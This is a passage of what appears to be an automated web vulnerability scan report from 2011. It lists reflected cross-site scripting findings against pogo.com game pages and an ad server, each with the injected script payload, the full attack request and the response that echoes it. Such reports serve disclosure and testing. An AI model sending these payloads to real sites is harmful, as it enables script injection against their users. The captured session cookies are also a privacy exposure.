Host: event.adxpose.com
Proxy-Connection: keep-alive
Referer: http://www.pandora.com/include/communityAdEmbed.html?genre=&artist=&webname=&sz=2000x8&ord=1294536136217419152&clean=0&spgs=0&tile=2&_id=bottom_leaderboard_container
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: evlu=ddad3821-ec58-4641-be95-961ec5aac4d2

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: JSESSIONID=7120D2DE321902B7B3818D64D2E6B825; Path=/
Cache-Control: no-store
Content-Type: text/javascript;charset=UTF-8
Content-Length: 144
Date: Sun, 09 Jan 2011 02:14:36 GMT
Connection: close

if (typeof __ADXPOSE_EVENT_QUEUES__ !== "undefined") __ADXPOSE_DRAIN_QUEUE__("ZC45X9Axu6NOUFfX_261541379da<script>alert(1)</script>ca2fdb18c7");

3.492. http://flash-games.pogo.com/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://flash-games.pogo.com
Path:	/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 67868"><script>alert(1)</script>789ef577dda was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /?67868"><script>alert(1)</script>789ef577dda=1 HTTP/1.1
Host: flash-games.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Set-Cookie: prod.JID=5B90D9FCEA1000D0B6AC868B2FB54BAD.000067; Domain=.pogo.com; Path=/
Content-Language: en-US
Set-Cookie: com.pogo.unid=6606527284785340; Domain=.pogo.com; Expires=Fri, 08-Jan-2016 02:14:44 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Date: Sun, 09 Jan 2011 02:14:44 GMT
Server: Apache-Coyote/1.1
Content-Length: 23789

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.
...[SNIP]...
<link rel="canonical" href="http://flash-games.pogo.com/?67868"><script>alert(1)</script>789ef577dda=1"/>
...[SNIP]...

3.493. http://game3.pogo.com/exhibit/game/game.jsp [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://game3.pogo.com
Path:	/exhibit/game/game.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 538d5"%3balert(1)//b87d69317dd was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 538d5";alert(1)//b87d69317dd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /exhibit/game/game.jsp?site=pogo&game=scrabble&lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.&init=1&538d5"%3balert(1)//b87d69317dd=1 HTTP/1.1
Host: game3.pogo.com
Proxy-Connection: keep-alive
Referer: http://game3.pogo.com/room/game/frameset.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&install=true&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&vmtype=sun&rhst=www.pogo.com&vmver=1.6.0_23&game=scrabble&auto=PlayNow
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Content-Length: 1776
Date: Sun, 09 Jan 2011 02:16:09 GMT
Server: Apache-Coyote/1.1

<html>

<head>
<script type="text/javascript" src="/v/CjsBMQ/js/ad.js"> </script>
<script language="Javascript">
function toRotating(){self.location="http://game3.pogo.com/exhibit/game/game.jsp?538d5";alert(1)//b87d69317dd=1&game=scrabble&site=pogo&lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.";}
setTimeout("toRotating()", 240000);
</script>
...[SNIP]...

3.494. http://game3.pogo.com/room/loading/init.jsp [ahst parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://game3.pogo.com
Path:	/room/loading/init.jsp

Issue detail

The value of the ahst request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8279c"><script>alert(1)</script>c01d161abf6 was submitted in the ahst parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /room/loading/init.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=8279c"><script>alert(1)</script>c01d161abf6&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow HTTP/1.1
Host: game3.pogo.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/games/scrabble?pageSection=free_home_hot_games1_pl_scrabble
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536852604-New%7C1297128852604%3B

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 09 Jan 2011 02:15:22 GMT
Server: Apache-Coyote/1.1
Content-Length: 851

<html>
<head>
<script src="/v/D7rqgA/js/room.js" type="text/javascript" charset="utf-8"></script>

<script>
function load() {
window.LoadingFrame.location.replace("/room/loading/jvmte
...[SNIP]...
<frame name="AdFrame" src="/exhibit/loading/loading.jsp?pwid=760&phei=574&site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=8279c"><script>alert(1)</script>c01d161abf6&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow" noresize scrolling=no marginwidth=0 marginheight=0>
...[SNIP]...

3.495. http://game3.pogo.com/room/loading/init.jsp [anam parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://game3.pogo.com
Path:	/room/loading/init.jsp

Issue detail

The value of the anam request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 481a1"><script>alert(1)</script>576b5d6378a was submitted in the anam parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /room/loading/init.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=481a1"><script>alert(1)</script>576b5d6378a&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow HTTP/1.1
Host: game3.pogo.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/games/scrabble?pageSection=free_home_hot_games1_pl_scrabble
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536852604-New%7C1297128852604%3B

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 09 Jan 2011 02:15:21 GMT
Server: Apache-Coyote/1.1
Content-Length: 847

<html>
<head>
<script src="/v/D7rqgA/js/room.js" type="text/javascript" charset="utf-8"></script>

<script>
function load() {
window.LoadingFrame.location.replace("/room/loading/jvmte
...[SNIP]...
<frame name="AdFrame" src="/exhibit/loading/loading.jsp?pwid=760&phei=574&site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=481a1"><script>alert(1)</script>576b5d6378a&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow" noresize scrolling=no marginwidth=0 marginheight=0>
...[SNIP]...

3.496. http://game3.pogo.com/room/loading/init.jsp [apid parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://game3.pogo.com
Path:	/room/loading/init.jsp

Issue detail

The value of the apid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f60b"><script>alert(1)</script>03774fbd27d was submitted in the apid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /room/loading/init.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=9f60b"><script>alert(1)</script>03774fbd27d&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow HTTP/1.1
Host: game3.pogo.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/games/scrabble?pageSection=free_home_hot_games1_pl_scrabble
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536852604-New%7C1297128852604%3B

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 09 Jan 2011 02:15:21 GMT
Server: Apache-Coyote/1.1
Content-Length: 851

<html>
<head>
<script src="/v/D7rqgA/js/room.js" type="text/javascript" charset="utf-8"></script>

<script>
function load() {
window.LoadingFrame.location.replace("/room/loading/jvmte
...[SNIP]...
<frame name="AdFrame" src="/exhibit/loading/loading.jsp?pwid=760&phei=574&site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=9f60b"><script>alert(1)</script>03774fbd27d&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow" noresize scrolling=no marginwidth=0 marginheight=0>
...[SNIP]...

3.497. http://game3.pogo.com/room/loading/init.jsp [auto parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://game3.pogo.com
Path:	/room/loading/init.jsp

Issue detail

The value of the auto request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36ecf"><script>alert(1)</script>379a9cf2e56 was submitted in the auto parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /room/loading/init.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=36ecf"><script>alert(1)</script>379a9cf2e56 HTTP/1.1
Host: game3.pogo.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/games/scrabble?pageSection=free_home_hot_games1_pl_scrabble
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536852604-New%7C1297128852604%3B

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 09 Jan 2011 02:15:31 GMT
Server: Apache-Coyote/1.1
Content-Length: 858

<html>
<head>
<script src="/v/D7rqgA/js/room.js" type="text/javascript" charset="utf-8"></script>

<script>
function load() {
window.LoadingFrame.location.replace("/room/loading/jvmte
...[SNIP]...
oading.jsp?pwid=620&phei=411&site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=36ecf"><script>alert(1)</script>379a9cf2e56" noresize scrolling=no marginwidth=0 marginheight=0>
...[SNIP]...

3.498. http://game3.pogo.com/room/loading/init.jsp [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://game3.pogo.com
Path:	/room/loading/init.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8ea62</script><script>alert(1)</script>3760e1d6c18 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Request

GET /room/loading/init.jsp?8ea62</script><script>alert(1)</script>3760e1d6c18=1 HTTP/1.1
Host: game3.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.hp.ls.cfg=0; op600clubpogogum=a00200200a2719m0337lk0d3e;

Response (redirected)

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Type: text/html;charset=UTF-8
Content-Length: 4188
Date: Sun, 09 Jan 2011 02:14:50 GMT
Server: Apache-Coyote/1.1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head>
   <title>
   Pogo:
   Address Messed Up
   </title>



...[SNIP]...
TrackVars + 'prop6,' }
}
if (s.linkTrackEvents != 'None') {s.linkTrackVars=s.linkTrackVars + 'events';}
s.tl(source,'o',pageName);
}
s.referrer="http://game3.pogo.com/room/loading/init.jsp?8ea62</script><script>alert(1)</script>3760e1d6c18=1";
s.eVar2="pogo";
s.pageName="ERROR: Address Messed Up Page";
s.prop2="pogo";
s.channel="pogo";
s.prop7="POGO:pogo:error::ERROR: Address Messed Up Page:Non Authenticated";
s.prop8="Non Authenticated
...[SNIP]...

3.499. http://game3.pogo.com/room/loading/init.jsp [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://game3.pogo.com
Path:	/room/loading/init.jsp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc140"><script>alert(1)</script>b2bbcc6ee94 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /room/loading/init.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow&fc140"><script>alert(1)</script>b2bbcc6ee94=1 HTTP/1.1
Host: game3.pogo.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/games/scrabble?pageSection=free_home_hot_games1_pl_scrabble
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536852604-New%7C1297128852604%3B

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 09 Jan 2011 02:15:32 GMT
Server: Apache-Coyote/1.1
Content-Length: 868

<html>
<head>
<script src="/v/D7rqgA/js/room.js" type="text/javascript" charset="utf-8"></script>

<script>
function load() {
window.LoadingFrame.location.replace("/room/loading/jvmte
...[SNIP]...
sp?pwid=760&phei=574&site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow&fc140"><script>alert(1)</script>b2bbcc6ee94=1" noresize scrolling=no marginwidth=0 marginheight=0>
...[SNIP]...

3.500. http://game3.pogo.com/room/loading/init.jsp [rhst parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://game3.pogo.com
Path:	/room/loading/init.jsp

Issue detail

The value of the rhst request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38ea8"><script>alert(1)</script>611e5c167b was submitted in the rhst parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /room/loading/init.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=38ea8"><script>alert(1)</script>611e5c167b&game=scrabble&auto=PlayNow HTTP/1.1
Host: game3.pogo.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/games/scrabble?pageSection=free_home_hot_games1_pl_scrabble
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536852604-New%7C1297128852604%3B

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 09 Jan 2011 02:15:24 GMT
Server: Apache-Coyote/1.1
Content-Length: 852

<html>
<head>
<script src="/v/D7rqgA/js/room.js" type="text/javascript" charset="utf-8"></script>

<script>
function load() {
window.LoadingFrame.location.replace("/room/loading/jvmte
...[SNIP]...
AdFrame" src="/exhibit/loading/loading.jsp?pwid=760&phei=574&site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=38ea8"><script>alert(1)</script>611e5c167b&game=scrabble&auto=PlayNow" noresize scrolling=no marginwidth=0 marginheight=0>
...[SNIP]...

3.501. http://game3.pogo.com/room/loading/init.jsp [rspt parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://game3.pogo.com
Path:	/room/loading/init.jsp

Issue detail

The value of the rspt request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cfa77"><script>alert(1)</script>6d9ec8f62ed was submitted in the rspt parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /room/loading/init.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=cfa77"><script>alert(1)</script>6d9ec8f62ed&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow HTTP/1.1
Host: game3.pogo.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/games/scrabble?pageSection=free_home_hot_games1_pl_scrabble
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536852604-New%7C1297128852604%3B

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 09 Jan 2011 02:15:22 GMT
Server: Apache-Coyote/1.1
Content-Length: 860

<html>
<head>
<script src="/v/D7rqgA/js/room.js" type="text/javascript" charset="utf-8"></script>

<script>
function load() {
window.LoadingFrame.location.replace("/room/loading/jvmte
...[SNIP]...
<frame name="AdFrame" src="/exhibit/loading/loading.jsp?pwid=760&phei=574&site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=cfa77"><script>alert(1)</script>6d9ec8f62ed&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow" noresize scrolling=no marginwidth=0 marginheight=0>
...[SNIP]...

3.502. http://game3.pogo.com/room/loading/init.jsp [scrn parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://game3.pogo.com
Path:	/room/loading/init.jsp

Issue detail

The value of the scrn request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b1fca"><script>alert(1)</script>aa742097ac6 was submitted in the scrn parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /room/loading/init.jsp?site=pogo&scrn=b1fca"><script>alert(1)</script>aa742097ac6&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow HTTP/1.1
Host: game3.pogo.com
Proxy-Connection: keep-alive
Referer: http://www.pogo.com/games/scrabble?pageSection=free_home_hot_games1_pl_scrabble
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536852604-New%7C1297128852604%3B

Response

HTTP/1.1 200 OK
Expires: 0
Cache-Control: max-age=0, private
Content-Language: en-US
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 09 Jan 2011 02:15:12 GMT
Server: Apache-Coyote/1.1
Content-Length: 860

<html>
<head>
<script src="/v/D7rqgA/js/room.js" type="text/javascript" charset="utf-8"></script>

<script>
function load() {
window.LoadingFrame.location.replace("/room/loading/jvmte
...[SNIP]...
<frame name="AdFrame" src="/exhibit/loading/loading.jsp?pwid=760&phei=574&site=pogo&scrn=b1fca"><script>alert(1)</script>aa742097ac6&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow" noresize scrolling=no marginwidth=0 marg
...[SNIP]...

3.503. http://game3.pogo.com/room/loading/init.jsp [ugifts parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://game3.pogo.com
Path:	/room/loading/init.jsp

Issue detail

The value of the ugifts request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1eecd"><script>alert(1)</script>32bc7416dcb was submitted in the ugifts parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /room/loading/init.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=1eecd"><script>alert(1)</script>32bc7416dcb&rhst=www.pogo.com&game=scrabble&auto=PlayNow HTTP/1.1
